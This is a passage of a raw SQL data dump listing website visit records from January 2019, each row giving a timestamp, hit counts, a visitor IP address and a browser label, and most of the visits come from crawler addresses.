370644,1547468451,4,4,0,0,'216.244.66.241','other'),(370645,1547468494,1,1,0,0,'66.249.75.21','chrome'),(370646,1547468572,1,1,0,0,'66.249.75.15','chrome'),(370647,1547468573,1,1,0,0,'66.249.75.22','chrome'),(370648,1547468693,1,1,0,0,'46.229.168.151','other'),(370649,1547468785,1,1,0,0,'157.55.39.201','other'),(370650,1547468931,1,1,0,0,'54.36.148.197','other'),(370651,1547469079,1,1,0,0,'66.249.75.20','chrome'),(370652,1547469369,1,1,0,0,'54.36.149.30','other'),(370653,1547469587,4,4,0,0,'216.244.66.241','other'),(370654,1547469856,1,1,0,0,'66.249.69.204','chrome'),(370655,1547469962,1,1,0,0,'54.36.149.92','other'),(370656,1547470025,1,1,0,0,'54.36.149.94','other'),(370657,1547470031,1,1,0,0,'46.229.168.139','other'),(370658,1547470167,2,2,0,0,'91.196.178.65','chrome'),(370659,1547470226,1,1,0,0,'54.36.148.91','other'),(370660,1547470649,1,1,0,0,'54.36.148.88','other'),(370661,1547471027,1,1,0,0,'46.229.168.137','other'),(370662,1547471028,2,2,0,0,'46.229.168.136','other'),(370663,1547471112,1,1,0,0,'46.229.168.153','other'),(370664,1547471133,1,1,0,0,'54.36.148.115','other'),(370665,1547471262,9,9,0,0,'216.244.66.241','other'),(370666,1547471263,1,1,0,0,'54.36.149.14','other'),(370667,1547471332,1,1,0,0,'46.229.168.135','other'),(370668,1547471367,1,1,0,0,'95.134.210.28','chrome'),(370669,1547471460,1,1,0,0,'8.29.198.27','other'),(370670,1547471475,1,1,0,0,'46.229.168.142','other'),(370671,1547471949,2,2,0,0,'91.196.178.65','chrome'),(370672,1547471962,1,1,0,0,'178.154.244.65','other'),(370673,1547472071,1,1,0,0,'46.229.168.138','other'),(370674,1547472261,3,3,0,0,'216.244.66.241','other'),(370675,1547472263,1,1,0,0,'66.249.75.22','chrome'),(370676,1547472357,1,1,0,0,'93.73.246.207','other'),(370677,1547472404,1,1,0,0,'54.36.149.48','other'),(370678,1547472521,1,1,0,0,'54.36.148.81','other'),(370679,1547472580,1,1,0,0,'8.29.198.26','other'),(370680,1547472886,1,1,0,0,'46.211.149.145','chrome'),(370681,1547472980,1,1,0,0,'54.36.148.193','other'),(370682,1547473273,2,2,0,0,'216.244.66.241','other'),(370683,1547473673,2,2,0,0,'37.54.244.216','chrome'),(370684,1547473678,1,1,0,0,'178.154.244.11','other'),(370685,1547473767,1,1,0,0,'66.249.69.200','chrome'),(370686,1547473768,1,1,0,0,'54.36.149.95','other'),(370687,1547473962,2,2,0,0,'66.249.75.22','chrome'),(370688,1547473965,1,1,0,0,'54.36.148.84','other'),(370689,1547473997,1,1,0,0,'95.133.16.17','firefox'),(370690,1547474182,1,1,0,0,'66.249.75.17','chrome'),(370691,1547474260,1,1,0,0,'54.36.148.90','other'),(370692,1547474307,1,1,0,0,'87.250.224.47','other'),(370693,1547474315,2,2,0,0,'91.196.178.52','chrome'),(370694,1547474327,4,4,0,0,'5.45.207.19','other'),(370695,1547474329,1,1,0,0,'37.204.75.202','chrome'),(370696,1547474332,2,2,0,0,'91.209.11.236','other'),(370697,1547474388,1,1,0,0,'91.196.178.76','chrome'),(370698,1547474429,1,1,0,0,'216.244.66.241','other'),(370699,1547474488,1,1,0,0,'66.249.75.20','chrome'),(370700,1547474592,1,1,0,0,'66.249.75.21','chrome'),(370701,1547474706,3,3,0,0,'5.45.207.79','other'),(370702,1547474802,1,1,0,0,'54.36.148.23','other'),(370703,1547474824,1,1,0,0,'178.154.244.11','other'),(370704,1547474869,1,1,0,0,'37.9.113.148','other'),(370705,1547475115,1,1,0,0,'185.40.48.209','chrome'),(370706,1547475238,3,3,0,0,'195.114.136.66','chrome'),(370707,1547475288,2,2,0,0,'141.8.142.103','other'),(370708,1547475350,1,1,0,0,'87.250.224.47','other'),(370709,1547475375,1,1,0,0,'5.45.207.19','other'),(370710,1547475462,2,2,0,0,'216.244.66.241','other'),(370711,1547475523,2,2,0,0,'54.36.149.77','other'),(370712,1547475630,1,1,0,0,'66.249.69.204','chrome'),(370713,1547475755,1,1,0,0,'54.36.149.70','other'),(370714,1547475874,1,1,0,0,'54.36.148.48','other'),(370715,1547475928,1,1,0,0,'66.249.69.202','chrome'),(370716,1547476042,8,8,0,0,'54.87.18.165','other'),(370717,1547476249,2,2,0,0,'52.53.201.78','chrome'),(370718,1547476321,2,2,0,0,'46.229.168.138','other'),(370719,1547476538,1,1,0,0,'46.229.168.142','other'),(370720,1547476547,1,1,0,0,'207.46.13.171','other'),(370721,1547476725,1,1,0,0,'46.229.168.150','other'),(370722,1547476895,9,9,0,0,'216.244.66.241','other'),(370723,1547477022,1,1,0,0,'5.45.207.79','other'),(370724,1547477058,1,1,0,0,'66.249.75.20','chrome'),(370725,1547477195,1,1,0,0,'54.36.148.208','other'),(370726,1547477842,1,1,0,0,'54.36.149.32','other'),(370727,1547478075,1,1,0,0,'54.36.148.115','other'),(370728,1547478579,2,2,0,0,'216.244.66.241','other'),(370729,1547479335,1,1,0,0,'66.249.75.20','chrome'),(370730,1547479366,2,2,0,0,'23.228.96.82','chrome'),(370731,1547479685,1,1,0,0,'54.36.149.21','other'),(370732,1547479720,7,7,0,0,'216.244.66.241','other'),(370733,1547479945,1,1,0,0,'54.36.148.106','other'),(370734,1547480581,1,1,0,0,'66.249.75.20','chrome'),(370735,1547480753,4,4,0,0,'216.244.66.241','other'),(370736,1547480969,1,1,0,0,'66.102.9.40','chrome'),(370738,1547480979,1,1,0,0,'54.36.148.69','other'),(370739,1547481099,1,1,0,0,'46.229.168.152','other'),(370740,1547481101,1,1,0,0,'46.229.168.135','other'),(370741,1547481696,1,1,0,0,'66.249.75.17','chrome'),(370742,1547481697,2,2,0,0,'66.249.75.22','chrome'),(370743,1547481780,1,1,0,0,'46.229.168.139','other'),(370744,1547481820,1,1,0,0,'66.249.75.16','chrome'),(370745,1547482293,1,1,0,0,'8.29.198.25','other'),(370746,1547482327,1,1,0,0,'54.36.148.180','other'),(370747,1547482532,2,2,0,0,'216.244.66.241','other'),(370748,1547482663,1,1,0,0,'66.249.75.20','chrome'),(370749,1547482727,1,1,0,0,'54.36.149.23','other'),(370750,1547483085,1,1,0,0,'46.229.168.146','other'),(370751,1547483422,1,1,0,0,'66.249.69.200','chrome'),(370752,1547483427,1,1,0,0,'8.29.198.25','other'),(370753,1547483437,1,1,0,0,'54.36.148.155','other'),(370754,1547483535,5,5,0,0,'216.244.66.241','other'),(370755,1547483548,1,1,0,0,'54.36.148.234','other'),(370756,1547483602,1,1,0,0,'91.244.51.134','chrome'),(370757,1547483713,1,1,0,0,'180.76.15.29','other'),(370758,1547483714,1,1,0,0,'180.76.15.161','other'),(370759,1547483844,2,2,0,0,'46.211.122.20','chrome'),(370760,1547483873,1,1,0,0,'54.36.148.249','other'),(370761,1547483887,1,1,0,0,'46.229.168.150','other'),(370762,1547484733,2,2,0,0,'46.229.168.142','other'),(370763,1547484752,1,1,0,0,'66.249.69.217','chrome'),(370764,1547484753,1,1,0,0,'66.249.69.202','chrome'),(370765,1547485025,1,1,0,0,'54.36.149.59','other'),(370766,1547485058,1,1,0,0,'66.249.75.21','chrome'),(370767,1547485083,1,1,0,0,'46.229.168.129','other'),(370768,1547485113,1,1,0,0,'54.36.148.65','other'),(370769,1547485313,12,12,0,0,'216.244.66.241','other'),(370770,1547485423,1,1,0,0,'46.229.168.144','other'),(370771,1547485425,1,1,0,0,'46.229.168.138','other'),(370772,1547485431,1,1,0,0,'54.36.149.43','other'),(370773,1547485498,1,1,0,0,'54.36.149.15','other'),(370774,1547485713,1,1,0,0,'180.76.15.5','other'),(370775,1547486229,4,4,0,0,'216.244.66.241','other'),(370776,1547486478,1,1,0,0,'66.249.69.200','chrome'),(370777,1547486517,1,1,0,0,'66.249.75.20','chrome'),(370778,1547486594,2,2,0,0,'66.249.75.22','chrome'),(370779,1547486657,1,1,0,0,'95.163.255.109','other'),(370780,1547486671,1,1,0,0,'95.163.255.119','other'),(370781,1547486672,1,1,0,0,'54.36.148.189','other'),(370782,1547486701,2,2,0,0,'91.209.11.236','other'),(370783,1547486783,1,1,0,0,'66.249.75.15','chrome'),(370785,1547486860,2,2,0,0,'193.201.224.211','msie'),(370786,1547486911,1,1,0,0,'178.154.244.11','other'),(370787,1547487135,1,1,0,0,'40.77.167.62','other'),(370788,1547487141,2,2,0,0,'207.46.13.59','other'),(370789,1547487283,2,2,0,0,'95.108.213.4','other'),(370790,1547487362,5,5,0,0,'216.244.66.241','other'),(370791,1547487566,1,1,0,0,'54.36.148.252','other'),(370792,1547487632,1,1,0,0,'207.46.13.53','other'),(370793,1547487781,1,1,0,0,'54.36.148.100','other'),(370794,1547487851,1,1,0,0,'54.36.148.104','other'),(370795,1547487936,1,1,0,0,'46.229.168.146','other'),(370796,1547487949,1,1,0,0,'178.154.244.11','other'),(370797,1547487973,1,1,0,0,'54.36.148.204','other'),(370798,1547488067,1,1,0,0,'66.249.93.202','chrome'),(370800,1547488114,1,1,0,0,'37.9.113.148','other'),(370801,1547488145,1,1,0,0,'5.45.207.79','other'),(370802,1547488148,2,2,0,0,'141.8.142.103','other'),(370803,1547488363,4,4,0,0,'216.244.66.241','other'),(370804,1547488526,1,1,0,0,'54.36.148.154','other'),(370805,1547488588,1,1,0,0,'87.250.224.47','other'),(370806,1547488892,1,1,0,0,'54.36.149.98','other'),(370807,1547488935,1,1,0,0,'54.36.149.96','other'),(370808,1547489286,1,1,0,0,'157.55.39.225','other'),(370809,1547489384,3,3,0,0,'216.244.66.241','other'),(370810,1547490117,1,1,0,0,'207.46.13.171','other'),(370811,1547490394,1,1,0,0,'66.249.69.144','chrome'),(370812,1547490395,1,1,0,0,'66.249.69.149','chrome'),(370813,1547490557,1,1,0,0,'46.229.168.150','other'),(370814,1547490559,1,1,0,0,'46.229.168.148','other'),(370815,1547490576,1,1,0,0,'54.36.148.59','other'),(370816,1547490964,7,7,0,0,'216.244.66.241','other'),(370817,1547490999,1,1,0,0,'46.229.168.151','other'),(370818,1547491288,1,1,0,0,'54.36.148.84','other'),(370819,1547491548,1,1,0,0,'54.36.148.71','other'),(370820,1547491811,1,1,0,0,'54.36.148.177','other'),(370821,1547491917,4,4,0,0,'216.244.66.241','other'),(370822,1547492004,1,1,0,0,'66.249.69.202','chrome'),(370823,1547492200,6,6,0,0,'35.233.41.151','firefox'),(370824,1547492206,2,2,0,0,'35.233.41.151','other'),(370825,1547492280,1,1,0,0,'54.36.148.68','other'),(370826,1547492484,1,1,0,0,'46.229.168.150','other'),(370827,1547492581,1,1,0,0,'95.108.213.4','other'),(370828,1547492731,1,1,0,0,'54.36.149.31','other'),(370829,1547492826,1,1,0,0,'66.249.75.22','chrome'),(370830,1547492927,1,1,0,0,'54.36.148.61','other'),(370831,1547492946,1,1,0,0,'87.250.224.47','other'),(370832,1547492974,1,1,0,0,'54.36.149.19','other'),(370833,1547493070,1,1,0,0,'54.36.148.229','other'),(370834,1547493133,1,1,0,0,'8.29.198.27','other'),(370835,1547493161,1,1,0,0,'109.251.103.8','chrome'),(370836,1547493332,1,1,0,0,'54.36.148.31','other'),(370837,1547493704,1,1,0,0,'66.249.75.20','chrome'),(370838,1547493729,1,1,0,0,'54.36.148.158','other'),(370839,1547493952,2,2,0,0,'5.35.37.50','firefox'),(370840,1547494184,1,1,0,0,'5.45.207.19','other'),(370841,1547494187,2,2,0,0,'178.154.244.11','other'),(370842,1547494188,1,1,0,0,'5.45.207.79','other'),(370843,1547494284,1,1,0,0,'8.29.198.25','other'),(370844,1547494285,3,3,0,0,'216.244.66.241','other'),(370845,1547494290,1,1,0,0,'46.229.168.147','other'),(370846,1547494755,1,1,0,0,'54.36.149.40','other'),(370847,1547494862,1,1,0,0,'54.36.148.76','other'),(370848,1547494934,1,1,0,0,'54.36.148.158','other'),(370849,1547495101,2,2,0,0,'91.196.178.187','chrome'),(370850,1547495219,1,1,0,0,'216.244.66.241','other'),(370851,1547495404,1,1,0,0,'54.36.148.206','other'),(370852,1547495515,1,1,0,0,'54.36.149.82','other'),(370853,1547495762,2,2,0,0,'66.249.75.20','chrome'),(370854,1547495816,1,1,0,0,'157.55.13.64','other'),(370855,1547496418,1,1,0,0,'54.36.148.81','other'),(370856,1547496482,8,8,0,0,'216.244.66.241','other'),(370857,1547496830,1,1,0,0,'46.229.168.152','other'),(370858,1547497016,1,1,0,0,'178.154.244.11','other'),(370859,1547497227,1,1,0,0,'46.229.168.132','other'),(370860,1547497429,4,4,0,0,'216.244.66.241','other'),(370861,1547497478,1,1,0,0,'40.77.167.85','other'),(370862,1547498036,2,2,0,0,'91.209.11.236','other'),(370863,1547498110,1,1,0,0,'37.9.113.20','other'),(370864,1547498112,1,1,0,0,'54.36.149.76','other'),(370865,1547498163,1,1,0,0,'46.229.168.151','other'),(370866,1547498243,1,1,0,0,'87.250.224.65','other'),(370867,1547498246,1,1,0,0,'37.9.113.103','other'),(370868,1547498330,1,1,0,0,'54.36.149.84','other'),(370869,1547498508,1,1,0,0,'5.45.207.19','other'),(370870,1547498615,1,1,0,0,'91.196.178.181','chrome'),(370871,1547498681,1,1,0,0,'95.108.213.4','other'),(370872,1547498684,1,1,0,0,'46.229.168.154','other'),(370873,1547498833,1,1,0,0,'66.249.69.149','chrome'),(370874,1547498952,1,1,0,0,'54.36.148.96','other'),(370875,1547499000,1,1,0,0,'54.36.148.253','other'),(370876,1547499044,1,1,0,0,'54.36.149.31','other'),(370877,1547499154,1,1,0,0,'54.36.148.140','other'),(370878,1547499240,17,17,0,0,'216.244.66.241','other'),(370879,1547499359,1,1,0,0,'54.36.149.60','other'),(370880,1547499429,1,1,0,0,'46.229.168.150','other'),(370881,1547499431,1,1,0,0,'46.229.168.129','other'),(370882,1547499842,1,1,0,0,'54.36.148.29','other'),(370883,1547499989,1,1,0,0,'66.249.69.149','chrome'),(370884,1547500360,1,1,0,0,'54.36.148.241','other'),(370885,1547500814,2,2,0,0,'216.244.66.241','other'),(370886,1547500839,1,1,0,0,'54.36.149.91','other'),(370887,1547500883,1,1,0,0,'66.249.75.22','chrome'),(370888,1547501630,1,1,0,0,'54.36.148.70','other'),(370889,1547501647,1,1,0,0,'54.36.148.88','other'),(370890,1547501754,1,1,0,0,'54.36.149.35','other'),(370891,1547501793,1,1,0,0,'88.99.2.203','other'),(370892,1547501813,1,1,0,0,'136.243.70.68','other'),(370893,1547501994,1,1,0,0,'54.36.148.45','other'),(370894,1547502007,5,5,0,0,'216.244.66.241','other'),(370895,1547502326,1,1,0,0,'54.36.149.48','other'),(370896,1547502732,1,1,0,0,'54.36.148.170','other'),(370897,1547502960,1,1,0,0,'46.229.168.139','other'),(370898,1547503032,1,1,0,0,'46.229.168.135','other'),(370899,1547503183,1,1,0,0,'216.244.66.241','other'),(370900,1547503830,2,2,0,0,'40.77.167.85','other'),(370901,1547503833,1,1,0,0,'95.163.255.117','other'),(370902,1547503853,2,2,0,0,'95.163.255.104','other'),(370903,1547503873,1,1,0,0,'95.163.255.108','other'),(370904,1547503897,1,1,0,0,'95.163.255.118','other'),(370905,1547503921,1,1,0,0,'95.163.255.107','other'),(370906,1547503948,1,1,0,0,'95.163.255.102','other'),(370907,1547503951,1,1,0,0,'40.77.167.92','other'),(370908,1547503957,1,1,0,0,'54.36.148.221','other'),(370909,1547503963,1,1,0,0,'8.29.198.26','other'),(370910,1547503974,1,1,0,0,'95.163.255.116','other'),(370911,1547504184,1,1,0,0,'194.113.106.124','chrome'),(370912,1547504298,1,1,0,0,'46.229.168.129','other'),(370913,1547504474,1,1,0,0,'95.163.255.115','other'),(370914,1547504734,1,1,0,0,'54.36.148.189','other'),(370915,1547504771,15,15,0,0,'216.244.66.241','other'),(370916,1547504868,1,1,0,0,'54.36.148.19','other'),(370917,1547504930,1,1,0,0,'95.163.255.119','other'),(370918,1547505119,1,1,0,0,'8.29.198.25','other'),(370919,1547505183,1,1,0,0,'54.36.148.75','other'),(370920,1547505296,1,1,0,0,'54.36.149.7','other'),(370921,1547505571,1,1,0,0,'54.36.148.167','other'),(370922,1547505739,1,1,0,0,'54.36.149.107','other'),(370923,1547505895,1,1,0,0,'46.229.168.132','other'),(370924,1547506355,1,1,0,0,'54.36.148.99','other'),(370925,1547506524,1,1,0,0,'54.36.148.104','other'),(370926,1547506663,1,1,0,0,'46.229.168.130','other'),(370927,1547506665,1,1,0,0,'46.229.168.145','other'),(370928,1547507001,1,1,0,0,'54.36.149.85','other'),(370929,1547507089,1,1,0,0,'54.36.148.65','other'),(370930,1547507176,1,1,0,0,'54.36.149.24','other'),(370931,1547507526,10,10,0,0,'216.244.66.241','other'),(370932,1547507708,1,1,0,0,'54.36.149.61','other'),(370933,1547507782,1,1,0,0,'54.36.148.34','other'),(370934,1547507789,1,1,0,0,'46.229.168.134','other'),(370935,1547508065,1,1,0,0,'46.229.168.154','other'),(370936,1547508656,1,1,0,0,'216.244.66.241','other'),(370937,1547508994,1,1,0,0,'88.99.2.203','other'),(370938,1547509008,1,1,0,0,'54.36.148.55','other'),(370939,1547509029,1,1,0,0,'136.243.70.68','other'),(370940,1547509131,1,1,0,0,'87.250.224.47','other'),(370941,1547509140,1,1,0,0,'87.250.224.65','other'),(370942,1547509358,1,1,0,0,'37.9.113.103','other'),(370943,1547509368,1,1,0,0,'54.36.149.16','other'),(370944,1547509393,1,1,0,0,'37.9.113.148','other'),(370945,1547509954,1,1,0,0,'178.154.244.11','other'),(370946,1547510106,2,2,0,0,'54.36.149.8','other'),(370947,1547510166,1,1,0,0,'54.36.148.84','other'),(370948,1547510250,2,2,0,0,'95.163.255.92','other'),(370949,1547510326,4,4,0,0,'216.244.66.241','other'),(370950,1547510452,1,1,0,0,'46.229.168.149','other'),(370951,1547510926,1,1,0,0,'54.36.149.45','other'),(370952,1547511028,1,1,0,0,'54.36.148.171','other'),(370953,1547511334,3,3,0,0,'216.244.66.241','other'),(370954,1547511437,1,1,0,0,'66.249.69.204','chrome'),(370955,1547511469,1,1,0,0,'54.36.148.168','other'),(370956,1547511737,1,1,0,0,'54.36.148.164','other'),(370957,1547512095,1,1,0,0,'95.163.255.171','other'),(370958,1547512170,1,1,0,0,'54.36.148.91','other'),(370959,1547512299,1,1,0,0,'54.36.149.80','other'),(370960,1547512304,1,1,0,0,'54.36.148.92','other'),(370961,1547512696,1,1,0,0,'54.36.149.11','other'),(370962,1547512717,1,1,0,0,'54.36.149.60','other'),(370963,1547512900,1,1,0,0,'54.36.148.125','other'),(370964,1547513011,1,1,0,0,'54.36.149.106','other'),(370965,1547513086,5,5,0,0,'216.244.66.241','other'),(370966,1547513311,1,1,0,0,'64.246.165.10','firefox'),(370967,1547513372,1,1,0,0,'54.36.148.168','other'),(370968,1547513433,1,1,0,0,'46.229.168.134','other'),(370969,1547513548,1,1,0,0,'54.36.148.205','other'),(370970,1547513654,1,1,0,0,'54.36.148.112','other'),(370971,1547513717,1,1,0,0,'109.70.100.22','other'),(370972,1547513723,1,1,0,0,'109.70.100.20','other'),(370973,1547513741,1,1,0,0,'51.255.65.46','other'),(370974,1547513897,1,1,0,0,'54.36.149.45','other'),(370975,1547514041,1,1,0,0,'54.36.149.93','other'),(370976,1547514411,3,3,0,0,'216.244.66.241','other'),(370977,1547514795,1,1,0,0,'8.29.198.27','other'),(370978,1547515854,1,1,0,0,'46.229.168.148','other'),(370979,1547515918,8,8,0,0,'216.244.66.241','other'),(370980,1547515947,1,1,0,0,'8.29.198.26','other'),(370981,1547516050,1,1,0,0,'46.229.168.153','other'),(370982,1547516403,1,1,0,0,'95.163.255.92','other'),(370983,1547516409,1,1,0,0,'95.163.255.99','other'),(370984,1547516734,1,1,0,0,'66.249.69.217','chrome'),(370985,1547516735,1,1,0,0,'66.249.69.200','chrome'),(370986,1547516805,1,1,0,0,'95.163.255.96','other'),(370987,1547516857,1,1,0,0,'66.249.69.219','chrome'),(370988,1547516858,1,1,0,0,'66.249.69.202','chrome'),(370989,1547516868,1,1,0,0,'46.229.168.136','other'),(370990,1547516907,1,1,0,0,'180.76.15.13','other'),(370991,1547516908,1,1,0,0,'180.76.15.23','other'),(370992,1547517205,1,1,0,0,'216.244.66.241','other'),(370993,1547517296,2,2,0,0,'54.183.117.71','chrome'),(370994,1547517396,1,1,0,0,'95.163.255.159','other'),(370995,1547517664,1,1,0,0,'95.163.255.178','other'),(370996,1547517665,1,1,0,0,'95.163.255.177','other'),(370997,1547517895,1,1,0,0,'95.163.255.196','other'),(370998,1547517924,1,1,0,0,'95.163.255.156','other'),(370999,1547518763,10,10,0,0,'216.244.66.241','other'),(371000,1547519694,2,2,0,0,'216.244.66.241','other'),(371001,1547520312,1,1,0,0,'5.45.207.19','other'),(371002,1547520324,1,1,0,0,'46.229.168.139','other'),(371003,1547520707,3,3,0,0,'216.244.66.241','other'),(371004,1547520987,1,1,0,0,'87.250.224.65','other'),(371005,1547521717,4,4,0,0,'216.244.66.241','other'),(371006,1547521904,1,1,0,0,'66.249.75.21','chrome'),(371007,1547521954,1,1,0,0,'46.229.168.129','other'),(371008,1547522019,2,2,0,0,'178.133.86.64','chrome'),(371009,1547522142,1,1,0,0,'95.163.255.99','other'),(371010,1547522163,1,1,0,0,'95.163.255.97','other'),(371011,1547522189,1,1,0,0,'95.163.255.179','other'),(371012,1547522352,1,1,0,0,'5.45.207.79','other'),(371013,1547523015,1,1,0,0,'66.249.75.17','chrome'),(371014,1547523016,1,1,0,0,'66.249.75.20','chrome'),(371015,1547523031,1,1,0,0,'95.163.255.153','other'),(371016,1547523120,2,2,0,0,'216.244.66.241','other'),(371017,1547523114,1,1,0,0,'5.188.15.43','other'),(371018,1547523488,1,1,0,0,'46.229.168.139','other'),(371019,1547523490,2,2,0,0,'46.229.168.150','other'),(371020,1547524377,10,10,0,0,'216.244.66.241','other'),(371021,1547525113,2,2,0,0,'46.229.168.139','other'),(371022,1547525274,1,1,0,0,'178.154.244.11','other'),(371023,1547525893,1,1,0,0,'216.244.66.241','other'),(371024,1547526049,1,1,0,0,'65.19.138.34','other'),(371025,1547526054,1,1,0,0,'8.29.198.26','other'),(371026,1547526762,1,1,0,0,'213.180.203.9','other'),(371027,1547526774,1,1,0,0,'8.29.198.27','other'),(371028,1547527038,2,2,0,0,'91.196.178.90','firefox'),(371029,1547527210,6,6,0,0,'216.244.66.241','other'),(371030,1547527375,1,1,0,0,'95.163.255.96','other'),(371031,1547527383,1,1,0,0,'95.163.255.94','other'),(371032,1547528152,1,1,0,0,'46.229.168.151','other'),(371033,1547529206,1,1,0,0,'95.163.255.177','other'),(371034,1547529359,1,1,0,0,'66.249.69.202','chrome'),(371035,1547529965,1,1,0,0,'95.163.255.151','other'),(371036,1547529993,9,9,0,0,'216.244.66.241','other'),(371037,1547530741,1,1,0,0,'46.229.168.154','other'),(371038,1547530769,1,1,0,0,'46.229.168.140','other'),(371039,1547530844,1,1,0,0,'141.8.142.103','other'),(371040,1547531718,2,2,0,0,'216.244.66.241','other'),(371041,1547531800,2,2,0,0,'46.229.168.148','other'),(371042,1547532533,1,1,0,0,'84.0.40.53','other'),(371043,1547532545,1,1,0,0,'185.248.160.65','other'),(371044,1547532628,2,2,0,0,'54.202.245.23','chrome'),(371045,1547532771,11,11,0,0,'216.244.66.241','other'),(371046,1547532862,1,1,0,0,'46.229.168.146','other'),(371047,1547533035,2,2,0,0,'207.46.13.181','other'),(371048,1547533058,1,1,0,0,'95.163.255.98','other'),(371049,1547533157,1,1,0,0,'95.163.255.95','other'),(371050,1547533773,2,2,0,0,'95.163.255.92','other'),(371051,1547533785,1,1,0,0,'95.163.255.97','other'),(371052,1547533933,1,1,0,0,'95.163.255.161','other'),(371053,1547533939,1,1,0,0,'95.163.255.187','other'),(371054,1547534008,1,1,0,0,'94.253.80.61','msie'),(371055,1547534116,1,1,0,0,'216.244.66.241','other'),(371056,1547534404,1,1,0,0,'95.163.255.99','other'),(371057,1547534424,1,1,0,0,'66.249.69.144','chrome'),(371058,1547534426,1,1,0,0,'66.249.69.150','chrome'),(371059,1547534821,1,1,0,0,'95.163.255.94','other'),(371060,1547534828,1,1,0,0,'95.163.255.175','other'),(371061,1547534830,1,1,0,0,'95.163.255.169','other'),(371062,1547534941,1,1,0,0,'40.77.167.72','other'),(371063,1547534947,1,1,0,0,'46.229.168.139','other'),(371064,1547535006,1,1,0,0,'91.196.178.169','chrome'),(371065,1547535368,1,1,0,0,'66.249.69.202','chrome'),(371066,1547535564,5,5,0,0,'216.244.66.241','other'),(371067,1547535973,1,1,0,0,'46.229.168.154','other'),(371068,1547535998,1,1,0,0,'46.229.168.148','other'),(371069,1547536296,1,1,0,0,'95.163.255.150','other'),(371070,1547536531,1,1,0,0,'46.229.168.142','other'),(371071,1547536598,4,4,0,0,'216.244.66.241','other'),(371072,1547536875,1,1,0,0,'207.46.13.45','other'),(371073,1547536882,1,1,0,0,'8.29.198.26','other'),(371074,1547537090,1,1,0,0,'77.222.134.101','other'),(371075,1547537344,1,1,0,0,'91.196.178.65','chrome'),(371076,1547537615,1,1,0,0,'8.29.198.25','other'),(371077,1547537841,1,1,0,0,'40.77.167.2','other'),(371078,1547537942,1,1,0,0,'207.46.13.181','other'),(371079,1547538154,1,1,0,0,'46.229.168.146','other'),(371080,1547538215,1,1,0,0,'91.196.178.78','chrome'),(371081,1547538259,1,1,0,0,'66.249.69.143','chrome'),(371082,1547538260,2,2,0,0,'66.249.69.149','chrome'),(371083,1547538281,1,1,0,0,'66.249.69.144','chrome'),(371084,1547538285,1,1,0,0,'54.36.148.60','other'),(371085,1547538342,1,1,0,0,'77.222.134.101','other'),(371086,1547538354,10,10,0,0,'216.244.66.241','other'),(371087,1547538736,1,1,0,0,'54.36.148.70','other'),(371088,1547538780,1,1,0,0,'54.36.148.82','other'),(371089,1547538848,1,1,0,0,'157.55.39.167','other'),(371090,1547538891,1,1,0,0,'91.196.177.207','chrome'),(371091,1547539144,1,1,0,0,'54.36.149.75','other'),(371092,1547539218,1,1,0,0,'54.36.148.193','other'),(371093,1547539317,1,1,0,0,'95.163.255.157','other'),(371094,1547539465,1,1,0,0,'54.36.148.105','other'),(371095,1547539513,2,2,0,0,'176.36.21.189','chrome'),(371096,1547539592,1,1,0,0,'5.45.207.19','other'),(371097,1547539657,3,3,0,0,'216.244.66.241','other'),(371098,1547540020,1,1,0,0,'66.249.69.204','chrome'),(371099,1547540480,2,2,0,0,'141.8.142.103','other'),(371100,1547540499,1,1,0,0,'95.163.255.156','other'),(371101,1547540500,1,1,0,0,'95.163.255.190','other'),(371102,1547540607,1,1,0,0,'5.45.207.79','other'),(371103,1547540775,1,1,0,0,'207.46.13.45','other'),(371104,1547541025,1,1,0,0,'95.163.255.188','other'),(371105,1547541068,1,1,0,0,'178.154.244.11','other'),(371106,1547541073,1,1,0,0,'46.229.168.136','other'),(371107,1547541090,1,1,0,0,'54.36.149.85','other'),(371108,1547541188,5,5,0,0,'216.244.66.241','other'),(371109,1547541249,1,1,0,0,'178.154.171.24','other'),(371110,1547541253,1,1,0,0,'54.36.148.67','other'),(371111,1547541356,1,1,0,0,'37.9.113.20','other'),(371112,1547541411,1,1,0,0,'180.76.15.29','other'),(371113,1547541574,2,2,0,0,'91.196.178.85','firefox'),(371114,1547541606,1,1,0,0,'46.229.168.144','other'),(371115,1547541710,1,1,0,0,'37.9.113.148','other'),(371116,1547542180,1,1,0,0,'54.36.149.27','other'),(371117,1547542683,1,1,0,0,'46.229.168.142','other'),(371118,1547543129,5,5,0,0,'37.54.250.120','chrome'),(371119,1547543197,1,1,0,0,'46.229.168.140','other'),(371120,1547543309,82,82,0,0,'78.46.85.236','other'),(371121,1547543494,2,2,0,0,'199.58.86.209','other'),(371122,1547543950,1,1,0,0,'95.163.255.66','other'),(371123,1547543952,1,1,0,0,'95.163.255.67','other'),(371124,1547543970,1,1,0,0,'178.154.244.11','other'),(371125,1547544011,6,6,0,0,'216.244.66.241','other'),(371126,1547544031,2,2,0,0,'91.209.11.236','other'),(371127,1547544253,1,1,0,0,'54.36.148.218','other'),(371128,1547544529,2,2,0,0,'95.163.255.96','other'),(371129,1547544534,1,1,0,0,'95.163.255.98','other'),(371130,1547544709,1,1,0,0,'178.92.176.20','firefox'),(371131,1547544848,1,1,0,0,'207.46.13.45','other'),(371132,1547545013,1,1,0,0,'66.249.69.200','chrome'),(371133,1547545053,1,1,0,0,'157.55.39.83','other'),(371134,1547545281,1,1,0,0,'95.163.255.150','other'),(371135,1547545345,2,2,0,0,'95.135.44.38','chrome'),(371136,1547545348,1,1,0,0,'95.163.255.99','other'),(371137,1547545448,39,39,0,0,'5.9.88.113','other'),(371138,1547545607,1,1,0,0,'95.132.23.185','firefox'),(371139,1547545902,1,1,0,0,'46.229.168.135','other'),(371140,1547545904,1,1,0,0,'46.229.168.153','other'),(371141,1547545950,1,1,0,0,'91.196.178.72','firefox'),(371142,1547545984,1,1,0,0,'91.196.178.85','firefox'),(371143,1547546159,1,1,0,0,'95.163.255.194','other'),(371144,1547546162,1,1,0,0,'95.163.255.197','other'),(371145,1547546303,2,2,0,0,'91.196.178.65','chrome'),(371146,1547546411,2,2,0,0,'176.37.121.202','chrome'),(371147,1547546522,1,1,0,0,'66.249.69.150','chrome'),(371148,1547546583,1,1,0,0,'95.163.255.190','other'),(371149,1547546622,1,1,0,0,'46.229.168.134','other'),(371150,1547546624,1,1,0,0,'46.229.168.144','other'),(371151,1547546783,8,8,0,0,'216.244.66.241','other'),(371152,1547547168,1,1,0,0,'54.36.148.241','other'),(371153,1547547206,1,1,0,0,'91.196.178.65','chrome'),(371154,1547547272,1,1,0,0,'95.132.18.56','chrome'),(371155,1547547354,1,1,0,0,'5.45.207.19','other'),(371156,1547547558,1,1,0,0,'91.196.178.72','firefox'),(371157,1547547649,